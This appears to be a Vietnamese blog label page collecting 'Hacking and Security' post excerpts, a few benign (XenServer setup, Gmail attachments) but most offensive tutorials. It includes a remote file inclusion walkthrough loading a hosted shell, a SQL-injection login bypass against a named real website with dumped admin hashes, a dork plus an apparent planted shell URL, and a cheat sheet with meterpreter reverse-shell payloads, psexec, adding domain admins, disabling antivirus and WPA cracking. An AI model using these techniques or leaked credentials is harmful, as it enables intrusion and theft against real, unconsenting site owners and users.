Hiển thị các bài đăng có nhãn Hacking and Security. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Hacking and Security. Hiển thị tất cả bài đăng

Cách bảo vệ Admincp của diễn đàn Vbulletin​

Những việc mà các bạn cần tìm hiểu và làm đó là:
1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho :))
vd: Aitimduocadmincpnaykhong

2. Đặt mật khẩu bảo vệ thư mục cho cái thư mục admincp fake (Aitimduocadmincpnaykhong) này, có nhiều cách như add code vào global.php, index.php, hay đơn giản là cứ .htaccess + .htpasswd mà táng. Mấy bài hướng dẫn dạng này nhiều vô số kể các bạn tìm rồi làm theo thôi.

3. Thực hiện 2 bước dưới đây để chống lại việc tìm ra path thật bằng những tính năng có sẵn của Vbulletin.
a. Phân quyền lại cho các nhóm từ Mod
-> Cao nhất không cho xem Location của thành viên khác khi dùng chức năng Who's online nhiều bản việt hóa nó dịch thành "phúc trình vãng lai" gì đó trên forum. Cách phân quyền như sau: Login vào admincp trước rồi vào
Admin CP -> Usergroups -> Usergroup Manager -> Edit Usergroup -> Who's Online Permissions -> Can View Detailed Location Info for Users -> No
Save lại và làm tương tự cho các nhóm (Group) còn lại thế là xong phần phân quyền tránh dòm ngó.

b. Giới hạn Current activity (hoạt động hiện tại) trên các tài khoản có quyền truy cập vào admincp fake đó. bằng cách sửa code trong tempate đang sài. để không cho hiển thị những thông tin có thể làm lộ location của admin khi đang hành sự trên diễn đàn. Login vào admincp rồi vào

Styles & Templates -> Search in Templates -> tìm với skin muốn sửa và tìm với từ khóa : current activity
-> ra cái kết quả màu mè MEMBERINFO -> click vào nó và tìm tiếp với từ current activity sẽ thấy đoạn code như sau:


PHP:

Xem Thêm

 

Backdoor trong modem D-Link và khai thác

Một người bạn đã đưa cho tôi bài viết này.

Backdoor trong modem D-Link và khai thác với chrome

reverse engineering đối với firmware của modem D-Link và phát hiện trong đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem D-Link.

Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng:


Mã:

Xem Thêm

 

Hướng dẫn cài đặt XenServer 6 và XenCenter

Yêu cầu hệ thống

XenServer chạy trực tiếp trên phần cứng đồng nghĩa với việc sẽ không có bất cứ thứ gì nằm giữa phần cứng và XenServer. Nói cách khác, XenServer đúng nghĩa là một hệ điều hành. Nó sẽ giao tiếp trực tiếp với phần cứng, gồm cả card mạng (NIC) và bộ điều khiển lưu trữ.

Chương trình yêu cầu CPU 64 bit kích hoạt Intel VT hoặc AMD-V. Nhưng, đây chỉ là khuyến nghị từ nhà cung cấp. XenServer vẫn có thể được cài nếu CPU không được kích hoạt Intel VT hay AMD-V. Tuy nhiên, các tiện ích và tính năng sẽ bị hạn chế.

Nhớ rằng, XenServer là một chương trình ảo hóa một phần. Nó sử dụng kỹ thuật ảo hóa một phần trong ảo hóa server. Do đó, chương trình đòi hỏi bộ xử lý trên server vật lý có khả năng thực hiện công nghệ ảo hóa để ta có thể tận dụng hết khả năng của nó.

Người dùng cần tối thiểu 2GB RAM chỉ để cài đặt XenServer, nhưng theo khuyến nghị, nên sử dụng ít nhất 8GB RAM, đặc biệt nếu người dùng dự định tạo nhiều máy ảo trên đó. Bản thân XenServer yêu cầu 16GB bộ nhớ nhưng, ta sẽ cần nhiều không gian hơn cho máy ảo.

Chương trình có thể hoạt động với một bộ điều khiển NIC 100Mb. Tuy nhiên, bộ điều khiển một Gigabit hay thậm chí 10Gigabit được khuyến nghị.

Phần cứng cho XenServer

Có thể đặt 1TB RAM, 16 NIC và 64 bộ xử lý logic trên một máy chủ (host) vật lý chạy XenServer. Nhớ rằng các bộ xử lý logic là sự kết hợp của nhiều lõi.

Hãy kiểm tra danh sách phần cứng tương thích (HCL) tại hcl.xensource.com trước khi trả tiền mua phần cứng hay thiết bị ngoại vi dự đính gắn vào server.

Trong hầu hết trường hợp, khi người dùng tìm đến một nhà cung cấp phần mềm và bảo cho họ cái mình định làm với server (ví dụ làm XenServer), trước hết, nhà cung cấp sẽ kiểm tra tính tương thích. Tuy nhiên, hãy kiểm tra các phần cứng như thiết bị ngoại vi, NIC… trong HCL để tránh những phát sinh trong quá trình cài đặt và sử dụng sau đó.

XenServer thực ra được cài trên phần cứng lớp server. Tuy nhiên, do là một bản phân phối Linux và do đang sử dụng kỹ thuật ảo hóa một phần nên nó có thể tương thích với nhiều loại máy để bàn hay thậm chí là laptop.

Vì vậy, nếu muốn thử nghiệm, người dùng có thể cài XenServer lên một laptop hay trên một máy trạm, chương trình sẽ vẫn hoạt động.

Tải Citrix XenServer 6 và XenCenter

Tải XenServer và XenCenter từ http://www.citrix.com/xenserver. Hoặc nếu có tài khoản MyCitrix, bạn có thể truy cập vào http://www.citrix.com/mycitrix để tải chương trình.

XenServer có dung lượng 508MB (file đuôi ISO) và XenCenter là 41MB.

Cài đặt XenServer thì nhanh và dễ dàng. Sau đây là các bước cài đặt:

Ghi file ISO vào một đĩa CD và cho đĩa vào ổ đĩa quang hoặc bung file bằng phần mềm như MagicISO.
Hãy đảm bảo VT (hay AMD-V) được kích hoạt trong BIOS của server.
Khởi động từ đĩa CD.
Đáp ứng các truy vấn thiết lập cơ bản và khởi động lại.
Thực hiện những cấu hình ban đầu, như gán địa chỉ IP, host name, mật khẩu…
Kết nối vào XenServer qua XenCenter.


Quá trình cài đặt chỉ mất khoảng 10 phút.
Yêu cầu cài đặt XenCenter

Citrix XenCenter là một ứng dụng nền Windows có thể được cài trên máy thật hoặc máy ảo.

Chương trình tương thích với bất cứ phiên bản Windows nào: Windows XP, Vista, 7, Server 2003, 2008 và 2008RC. XenCenter yêu cầu .NET Framework 3.5.

Yêu cầu được khuyến nghị như sau: Tần số 1GHz, RAM tối thiểu 2GB, tốc độ NIC ít nhất 100Mbps và độ phân giải màn hình tối thiểu 1024x768. Chương trình chiếm 100MB không gian đĩa cứng.
Cài đặt XenServer
http://www.thuvien-it.net/home/tinhoc/vi...eadid=7978

Xem Thêm

 

Hacking Website using RFI Method

RFI là gì (Remote File Inclusion)
Remote File Inclusion (RFI) là một loại tổn thương thường thấy nhất trên các trang web. Nó cho phép kẻ tấn công bao gồm một tập tin từ xa, thường là thông qua một kịch bản trên máy chủ web. Dễ bị tổn thương xảy ra do việc sử dụng của người dùng cung cấp đầu vào mà không xác nhận thích hợp. Điều này có thể dẫn đến một cái gì đó như tối thiểu như xuất ra các nội dung của tập tin, nhưng tùy thuộc vào mức độ nghiêm trọng, để liệt kê một vài có thể dẫn đến:

* thực hiện trên web
* thực hiện trên phía máy khách như JavaScript có thể dẫn đến các cuộc tấn công khác như cross site scripting (XSS).
* Từ chối dịch vụ (DoS)
* Dữ liệu Theft / ManipulationRFI một lỗ hổng rất phổ biến do các bản vá lỗi và cập nhật trên các trang web quá nhiều.

Bây giờ để kiểm tra xem trang web xem có lỗi hay không để RFI sẽ trả về các lệnh sau đây
Victim chỉ là demo thôi nhé
*www.site.com/index.php?page=www.google.com*
Nếu trang web trả về google thì trang web đó bị lỗi

*/ Cần phải chuẩn bị một code shell .txt lên google search sẽ rất nhiều

*www.site.com/index.php?page=**www.oursite.com/shell.txt*

Xem Thêm

 

Cách login khi không decode đc md5 đối với 1 số site

Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá

1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.

Yêu cầu:

+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự

2. Trước tiên là tìm User,Pass:

http://traanh.vn/?frame=product_deta...m%20tbl_user--



1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.

Thay vì bỏ, thì còn phương án sau.

3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):

http://traanh.vn/admin/

4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.

Đến đây có lẽ vấn đề đã được giải quyết:

+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)


Xem Thêm

 

Sqlmap plugin for BurpSuite

Nếu bạn là 1 pentester, chắc hẳn không lạ gì 2 công cụ rất phổ biến là sqlmap và burpsuite. Nhưng kết hợp chúng lại với nhau để làm việc như là 1 công cụ thì chắc nhiều người chưa biết.

Sau đây là tutorial của namhb về việc kết hợp này.

Đầu tiên, chúng ta download plugin sqlmap của burpsuite về:

Download SQLmap plugin for Brupsuite at: http://code.google.com/p/gason/downloads/list

1 – Lưu nó lại cùng thư mục với brupsuite

2 – Sử dụng câu lệnh để khởi động brupsuite với plugin: ( ở trong Linux)

java -classpath gason-0.9.5.:”burpsuite_v1.4.01.jar” burp.StartBurp

3 -Khi bạn click vào tab proxy / action, bạn sẽ nhìn thấy tùy chọn send to sqlmap

[Hình: _r_-BO3n0LZXsnrUTNcSzxjegckx9RgHkDPujoDB...cjmflcPdUs]

Việc tiếp theo chỉ cần trỏ trình duyệt nhận brupsuite làm proxy.

[Hình: 4O7tu530hubLlAaAFLhH-KCkmokxxKhtMreIs_ye...YAVUzsePHY]

Sau khi đã chọn send to sqlmap, chúng ta sẽ thấy hiện ra SQLMap Options:

Ở trong SQLmap option, bạn phải:

1 – Cấu hình đường dẫn tới thư mục SQLmap bin

2 – Chọn action

3 – Các option cần thiết, sau đó run

[Hình: z2i_gC10aDHkWm3f8gPuvuzGQGIbZ-msi6UvBnoB...iCzgSyhqMY]

Và đây là kết quả thu được:

[Hình: nrsFOZccXwq9YY7083o2NqF9CvPdIQBGumSZ3D59...CLJi2p607E]

Xem Thêm

 

Exploit Com_Redmystic

Dork: inurl:/index.php?option=com_redmystic
http://www.discount-espresso.co.uk/media/r.php

Quăng link vào và Exploit. Nếu thành công sẽ xuất hiện link upload

Xem Thêm

 

RAR Password Recovery Professional 6.1

RAR Password Recovery Professional (RPRP) cho phép bạn khôi phục mật khẩu các tập tin nén dễ dàng với tỉ lệ thành công rất cao.

Tải tại đây(dung lượng 7,5MB), tương thích Windows XP/Vista/7/8 (32-bit và 64-bit).

Các tính năng chính của chương trình:

- Khả năng tìm được mật khẩu lên đến 90% với tất cả các phiên bản của WinRAR.

- Cung cấp ba hình thức phục hồi khá hiệu quả.

- Hỗ trợ CPU đa lõi và GPU, cho tốc độ làm việc nhanh hơn 15 lần so với các ứng dụng cùng loại.
Sử dụng

Giao diện chương trình rất trực quan và đơn giản, đầu tiên, bạn nhấn Open chọn tập tin nén có đặt mật khẩu. Sau đó, lựa chọn một trong ba phương pháp phục hồi được cung cấp, bao gồm:

Brute-force Attack: Phương pháp này sẽ thử qua tất cả các mật khẩu bằng cách kết hợp chữ, số, ký tự đặc biệt,… tốn rất nhiều thời gian, bạn chỉ nên chọn khi tìm kiếm các mật khẩu dài và phức tạp.

[Hình: image001.png]

Brute-force with Mask Attack: Sử dụng khi bạn còn nhớ một vài ký tự hay độ dài của mật khẩu.

Dictionary Attack: Phương pháp nầy hoạt động nhanh nhất, dựa vào từ điển mật khẩu được tích hợp sẵn.

[Hình: image003.png]

Nếu lựa chọn Brute-force Attack, bạn chỉ việc nhấn Start để RPRP bắt đầu công việc. Còn khi sử dụng phương pháp Brute-force with Mask Attack, bạn cần chuyển sang thẻ Brute-force, thiết lập độ dài tối thiểu (Min Length) và tối đa (MaxLength) của mật khẩu (nếu còn nhớ). Ngoài ra, để chương trình làm việc tốt hơn, bạn hãy cố gắng nhớ xem mật khẩu của mình có chứa một trong các ký tự ở mục Character Set hay không, nếu có thì chọn vào đó.

[Hình: image005.png]

Tương tự như vậy cho phương pháp Dictionary Attack, bạn cũng chuyển sang thẻ Dictionary. Tại đây, bạn có thể đánh dấu chọn vào ô Smart mutations để kích hoạt tính năng hoán đổi mật khẩu thông minh. Nếu muốn sử dụng từ điển mật khẩu của riêng mình để dò, bạn nhấn Select Dictionary File rồi duyệt đến tập tin .txt chứa danh sách các mật khẩu hay dùng.

[Hình: image007.png]

Cuối cùng, trước khi thực hiện việc dò tìm mật khẩu, bạn nên chuyển sang thẻ Options, đánh dấu chọn ô Shutdown the Computer after cracking finishes để chương trình tự động tắt máy sau khi đã tìm ra mật khẩu, nếu việc nầy mất nhiều thời gian. Xong, bạn nhấn Start. Khi tìm được mật khẩu, RPRP sẽ yêu cầu bạn sao chép lại và sử dụng nó để giải nén các tập tin.

[Hình: image009.png]
CEH

Xem Thêm

 

Gửi tệp tin .exe ngay trong Gmail

Gmail và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm.

Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.

[Hình: image001.png]

Gmail cho phép người dùng upload và chia sẻ các tệp tin thông qua Google Drive. Do đó, để khai thác thủ thuật này, trước tiên bạn cần phải kích hoạt tính năng New compose trong hộp thư của mình (để kích hoạt tính năng này, sau khi nhấn nút Compose để soạn thư mới, bạn nhìn lên phía trên bên phải nhãn Labels sẽ thấy dòng chữ Try out the new compose experience, hãy nhấn vào liên kết đó rồi nhấn tiếp nút Go it khi có thông báo hiện ra).

Kể từ giờ, mỗi khi bạn soạn thư mới thì sẽ có một cửa sổ New Message riêng được hiển thị tại góc dưới bên phải trang Gmail giống như cửa sổ chat. Trên thanh công cụ phía dưới cửa sổ soạn thư, bạn hãy rê chuột vào biểu tượng Attach files, khi đó biểu tượng xuất hiện ngay bên phải chính là biểu tượng của Google Drive (insert files using Drive). Một khi sử dụng tùy chọn này, bạn có thể upload một tệp tin với bất kỳ kiểu định dạng nào bao gồm cả file chạy (.exe).
[Hình: image003.png]
[Hình: image005.png]

Trong cửa sổ Insert files using Google Drive, bạn có thể upload một tệp tin từ máy tính bằng cách nhấn nút Select files from your computer hoặc sử dụng các tệp tin trực tiếp trong mục My Drive chứa dữ liệu đã có sẵn trong Google Drive, tiếp theo nhấn nút Insert để đính kèm nó, sau cùng nhấn send để gửi thư và bạn sẽ phải chọn Send & share để thừa nhận việc chia sẻ từ Google Drive.

[Hình: image008.jpg]

Bây giờ người nhận mở hộp thư mà bạn gửi tới, họ sẽ click vào file đã gửi để chuyển qua trang chứa tệp tin trong Goog Drive của bạn rồi nhấn nút Download để tải tệp tin về máy.

Tóm lại, với phương thức này cũng chẳng khác gì việc bạn share dữ liệu cho một người nào đó trong Google Drive thông qua email của họ, nhưng khi đang làm việc trong hộp thư Gmail thì sử dụng cách làm này sẽ mang lại thuận tiện đối với bạn.

Xem Thêm

 

Burp suite – Intercept Proxy [P 2]

Rất vui được gặp lại các bạn trong phần 2 của Burp Suite, công cụ Intercept Proxy cực kỳ hữu ích. Trong phần này mình sẽ đưa ra một số ví dụ cụ thể nhất khi áp dụng Brup Suite trong kỹ thuật hacking. Đây là những kinh nghiệm mình đúc rút được và có học hỏi từ internet nữa. Bài viết bao gồm 2 ví dụ (thực ra có nhiều lắm nhưng trong lúc thảng thốt mình ko nhớ rõ trang nào bị để demo nữa :D ).
XSS
XSS thông thường thì chúng ta không nói nhiều trong bài viết này nữa vì đưa script vào URL, thêm các thao tác sửa đổi, encode để chạy… Tuy nhiên, đã bao giờ bạn dùng acunetix nhận được thông báo như này:
1
Nói thật, trước khi biết sử dụng các công cụ chỉnh sửa http header, mình gặp cái này cũng há hốc mồm ko biết làm sao (đã POST lại phải URL encode), nhưng hiện tại thì rất đơn giản chúng ta chỉ cần sử dụng trình duyệt request đến url bị lỗi và bật brup suite ra hứng. Gói tin request thông thường
2
Thay thể luôn bằng request này (POST đã thay cho GET) một cách dễ dàng và forward gói tin đi
3
Xong,
4
Ngoài ví dụ này (POST) thì ngay cả khi gói tin GET nhưng nhiều khi chạy thẳng qua trình duyệt cũng ko được. Lúc đó Brup Suite là một lựa chọn tối ưu
FCKeditor 2.6.8 ASP upload Bypass
Điểm yếu này mới được Mostafa Azizi và Soroush Dalili công bố trong năm nay (many thanks), việc exploit lợi dụng điểm yếu khi fckeditor trên website victim sử dụng ASP làm connector để upload file. Điều thú vị là 99% tấn công thực hiện thành công nhờ Brup Suite. Chi tiết điểm yếu này các bạn có thể Google, mình sẽ đi luôn vào việc exploit. Do nó bao gồm nhiều thao tác nên để tiện theo dõi, mình làm video demo sau

Xem Thêm

 

Burp suite – Intercept Proxy [P 1]

Có lẽ tới thời điểm hiện tại burpsuite là công cụ đã rất phổ biến và rất nhiều người thành thạo sử dụng công cụ này. Do đó bài viết của mình chỉ giới thiệu sơ lược tính năng và thực nghiệm áp dụng công cụ này trong hoạt động pentest của mình.
Công cụ có cả bản free và pro (thương mại). Bản pro có tình năng cao cấp hơn là chức năng scan. Tất nhiên bản pro sẽ mất phí nhưng các bạn hoàn toàn có thể kiếm bản đã được cr*ck trên mạng không khó khăn mấy. Mình sẽ đi vào một số tính năng chính của bản free và chức năng scan của Pro
Thiết lập để sử dụng burpsuite
Trước tiên vì burpsuite được viết trên nền java do đó cần có Java Runtime Enviroment để chạy, lưu ý, các bạn nên tải bản jre 6 vì bản 7 mới nhất thì burpsuite lại không tương thích (chuối)
Thiết lập trên trình duyệt để các traffic từ máy sẽ đi qua burpsuite
Intercept Traffic
Thử nghiệm với một page bất kỳ ta có thể thấy traffic sẽ bị chặn tại burp suite trước, ta có thể chọn forward để gói tin đi tiếp hoặc drop để bỏ gói tin, dĩ nhiên thông tin trong traffic chúng ta hoàn toàn có thể thay đổi được trước khi forward
Repeater
Đây là một thành phần rất hữu ích của Burp Suite, nếu bạn cần thử nghiệm thay đổi header nhiều lần thì repeater là những gì mà bạn cần. Từ header chặn được, các bạn click chuột phải và chọn send to repeater, sau đó chuyển sang tab repeater sẽ thấy header mình cần thao tác. Công dụng của repeater là bạn có thể chỉnh sửa header thoải mái rồi chọn Go sau đó đợi header respone để biết server sẽ làm gì với header của mình. Nó đặc biệt hữu dụng vì có thể chỉnh sửa, Go nhiều lần mà không mất công vào lại browser, điền thông tin rồi submit rồi lại chỉnh trong proxy (quá tốn thời gian).
Encode/Decode
Chức năng mã hóa, giải mã của Brup Suite rất tốt, nó hỗ trợ rất nhiều loại mã và giải mã
Brute Force
Brup Suite có thể kiêm chức năng HTTP Authentication Testing với tính năng Intruder. Ví dụ, từ trang login quản trị, mình nhập thông tin bất kỳ là username=admistrator&password=123456. Trong proxy của Brup Suite sẽ thấy
Click chuột phải chọn send to intruder
Trong tab positions,chọn attack type là cluster bomb, bên dưới ta có thấy header với các giá trị được đánh dấu bởi ký tự $, tuy nhiên chúng ta chỉ cần quan tâm đến username và password, do đó trước hết hãy clear $ để bỏ hết đi và chỉ add $ bao quan giá trị của 2 biến mà ta quan tâm (ở đây là administrator và 123456) như hình vẽ.
OK như vậy trong tab payload bên cạnh sẽ có 2 payload set (tương ứng với với biến username và password). Tiến hành nhập giá trị cho biến 1 (username), có thể nhập bằng tay từng giá trị hoặc load file username mà bạn có
Tiến hành nhập giá trị cho biến 2 (password) tương tự biến 1
Từ menu intruder chọn attack
Kết quả
Status là 302 (Found) có nghĩa là username và password không đúng (found chứ không phải OK nhé, các bạn cần để ý cái này). Một số website thì code http khi đăng nhập sai là 302, 401 (access deny). Còn trong trường hợp nhập đúng sẽ là 200 (OK) hoặc 202 (Accepted). Do đó mã 302 thì phải cố gắng tiếp thôi :D
Scanner
Chức năng Scanner chỉ có trong phiên bản Pro, chất lượng scan của Brup Suite là khá tốt, có thể tham khảo thêm tại http://www.sectoolmarket.com/ để có cái nhìn tổng quan chất lượng các công cụ scan
Đặc điểm của brup suite là scan thụ động, chúng ta view site đến đâu nó sẽ scan đến đó, một vài kết quả scan được
Chúng ta cũng có thể cho brup suite scan chủ động một url nào đó qua proxy, chọn actively scan this item
Trên đây là các tính năng chính của Brup Suite, bài viết tới mình sẽ đi sâu vào ứng dụng của Brup Suite trong các trường hợp cụ thể.

Xem Thêm

 

[Tool Security] Windows Tools For Penetration Testing

Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.
HashCheck Shell Extension
The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).
Netcat
Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
Metasploit Framework
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
RealVNC Viewer

Remote access software for desktop and mobile platforms.
GetIf
SNMP tool that allows you to collect information about SNMP devices.
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.
PuTTY
PuTTY is an SSH and telnet client for the Windows platform.
Pass The Hash Toolkit
The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.
Cachedump
Recovering Windows Password Cache Entries.
Fport
Identify unknown open ports and their associated applications.
Nbtscan
This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.
Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo
Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.
ClearLogs
ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.
SQLDict
SQLdict is a dictionary attack tool for SQL Server.
PMDump
PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.
GrabItAll
GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.
DumpUsers
DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.
BrowseList
BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).
Remoxec
Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).
WMICracker
Brute-force tool for Windows Management Instrumentation (WMI).
Venom
Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.
SMBAT
The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.
RPCScan
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
LSASecretsDump
LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.
SQLPing
SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.
OAT
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
Pwdump7
Extract password hashes from local user accounts.
PsTools
The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.
Incognito
Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.
DumpSec
DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.
X-Deep32
X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.
LC5
Windows password cracker.
Ophcrack
Ophcrack is a free Windows password cracker based on rainbow tables.
SiVuS
SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Nguồn Blog
http://pentestlab.wordpress.com/

Xem Thêm

 

Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares


# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts


# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314


# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec


# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

Disable Antivirus


# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic


ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK


# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap


nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules


for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done 

Nguồn Blog
http://averagesecurityguy.info/cheat-sheet/ 

Xem Thêm

 

[Tutorial] Race condition attack trên ứng dụng web


Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
Xem xét đoạn code sau của ngân hàng trong việc trừ tiền :

Khi tiến trình 1 đang thực hiện câu lệnh $tongtien = $tongtien – $sotien thì một tiến trình 2 của người A đang đòi rút chèn ngang, lúc này hệ thống sẽ tạm dừng tiến trình 1 đang xử lý để quay sang xử lý tiến trình 2 :

Lúc này khi bắt đầu xử lý tiến trình 2, tổng tiền chưa được cập nhật bởi tiến trình 1 đã tạm dừng. Do đó số tiền trong tk lúc này vẫn là 10000 và sau khi thực hiện xong cả 2 tiến trình thì tổng tiền vẫn là 9990 mặc dù đã rút 2 lần. Như vậy race condition đã xảy ra khi mà 1 tiến trình chèn ngang tiến trình khác trong lúc các tham số vẫn chưa kịp cập nhật.
Ở đây mình tạo 1 đoạn code lấy tiền với khá nhiều việc, làm cho thời gian xử lý nó lên tới tận 1,2s và cố thử rút 8 lần mà chỉ bị trừ 10$
